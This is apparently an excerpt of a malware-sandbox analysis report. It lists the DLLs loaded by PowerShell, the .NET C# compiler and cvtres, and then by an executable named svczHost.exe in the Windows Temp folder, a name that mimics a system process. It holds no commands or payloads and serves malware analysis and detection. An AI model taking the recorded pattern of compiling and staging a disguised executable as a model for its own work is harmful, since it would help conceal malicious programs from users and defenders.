Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: icu.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: winhttp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: mswsock.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: wshunix.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: winrnr.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: wshbth.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: devobj.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: napinsp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: cryptsp.dll
